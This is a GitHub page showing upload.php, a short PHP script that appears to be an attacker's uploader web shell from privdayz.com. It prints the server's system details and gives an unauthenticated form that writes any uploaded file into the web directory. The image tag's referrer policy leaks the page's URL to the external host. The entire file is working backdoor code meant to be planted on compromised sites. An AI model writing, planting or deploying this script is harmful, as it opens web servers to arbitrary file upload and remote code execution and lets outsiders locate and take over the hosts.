-
Notifications
You must be signed in to change notification settings - Fork 20
Expand file tree
/
Copy pathupload.php
More file actions
12 lines (11 loc) · 726 Bytes
/
Copy pathupload.php
File metadata and controls
12 lines (11 loc) · 726 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
<?php
echo '<link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css" rel="stylesheet">
<center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" /></center><b>'.php_uname().'<br></b><b><br><br>'.''.'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
echo '<a href="https://privdayz.com/">www.privdayz.com</a>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done</b><br><br>'; }
else { echo '<b>Done</b><br><br>'; }
}
exit;?>